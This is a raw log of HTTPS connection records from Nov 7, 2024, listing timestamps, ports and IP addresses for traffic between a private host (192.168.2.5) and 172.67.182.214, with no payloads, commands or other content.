                                                                                                                                                                              Nov 7, 2024 18:04:48.104075909 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.104084015 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104120016 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.104846954 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104906082 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.144296885 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.144475937 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.216789961 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.216842890 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.216882944 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.216928005 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217029095 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217029095 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217029095 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217057943 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217103958 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217576027 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217631102 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217704058 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217752934 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217981100 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218033075 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218055010 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218099117 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218158960 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218205929 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218830109 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218875885 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218897104 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218904972 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218941927 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218982935 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218991995 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.259773016 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.259887934 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.259910107 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.259955883 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332396030 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332509041 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332525969 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332547903 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332578897 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332593918 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332622051 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332633972 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332664967 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332765102 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332813025 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332819939 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332858086 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.332948923 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332992077 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.332998037 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333003998 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333038092 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333043098 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333053112 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333093882 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333581924 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333631992 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333641052 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333664894 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333676100 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333827972 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333868980 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333874941 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333910942 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.333925962 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.333967924 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.334023952 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.334084988 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.375170946 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.375276089 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.447557926 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.447653055 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.447679043 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.447688103 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.447788954 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.447860003 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.447860003 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.447869062 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.447995901 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.448040962 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.448046923 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.448514938 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.448570013 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.448575974 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.448621988 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.449832916 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.449866056 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.449906111 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.449912071 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.449956894 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.449975967 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.451232910 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.451247931 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.451344013 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.451353073 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.451394081 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.563158035 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.563182116 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.563322067 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.563344955 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.563393116 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.564163923 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.564181089 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.564234972 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.564241886 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.564291954 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.565706015 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.565722942 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.565803051 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.565810919 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.565893888 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.678350925 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.678380013 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.678436041 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.678467035 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.678478003 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.678503990 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.678642988 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.678658962 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.678694010 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.678700924 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.678725958 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.678745985 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.679791927 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.679811001 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.679872036 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.679881096 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.679919004 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.682105064 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.682121992 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.682200909 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.682208061 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.682394981 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.793561935 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.793586969 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.793796062 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.793828964 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.793915987 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.794321060 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.794342995 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.794401884 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.794409990 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.794440985 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.795665026 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.795695066 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.795739889 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.795747995 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.795769930 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.795805931 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.797091961 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.797107935 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.797185898 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.797197104 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.797363997 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.909214020 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.909240961 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.909297943 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.909318924 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.909358025 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.909370899 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.909661055 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.909684896 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.909728050 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.909733057 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.909761906 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.911073923 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.911103964 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.911139011 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.911145926 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.911170959 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.911200047 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.914084911 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.914102077 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.914155960 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.914163113 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.914200068 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.914216042 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.024466038 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.024485111 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.024555922 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.024574041 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.024619102 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.024986982 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025002956 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025041103 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025047064 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025072098 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025103092 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025665045 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025681973 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025727987 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025736094 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025754929 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025844097 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.026757956 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.026787043 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.026819944 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.026825905 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.026855946 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.026871920 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.067998886 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.068022013 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.068089008 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.068109035 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.068133116 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.068142891 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.344959974 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.344989061 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345040083 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345065117 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345084906 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345155001 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345185995 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345199108 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345206976 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345230103 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345237970 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345242023 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345264912 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345304012 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.400969028 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427010059 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427047968 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.427119970 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427803040 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427818060 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.044266939 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.046001911 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.046015978 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.341300011 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344091892 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344120979 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344160080 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344173908 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344201088 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344217062 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344475985 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344520092 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344521046 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344530106 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344572067 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344580889 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.386400938 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.386410952 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.433299065 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.461672068 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.461781025 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.463062048 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.463069916 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492177963 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492213964 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492248058 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492252111 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.492259026 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492299080 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.492516041 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492690086 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.503953934 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.558243036 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.558267117 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.579473019 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.579577923 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.579605103 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609724998 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609760046 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609781027 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.609793901 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609805107 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609844923 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.610055923 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.610107899 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.610124111 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623423100 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623455048 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623483896 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.623508930 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623594046 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.697134018 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727678061 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727718115 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727751017 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727782965 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727792978 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727817059 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727832079 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727859020 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727864027 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727922916 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727963924 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727968931 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.740766048 CET44349808172.67.182.214192.168.2.5
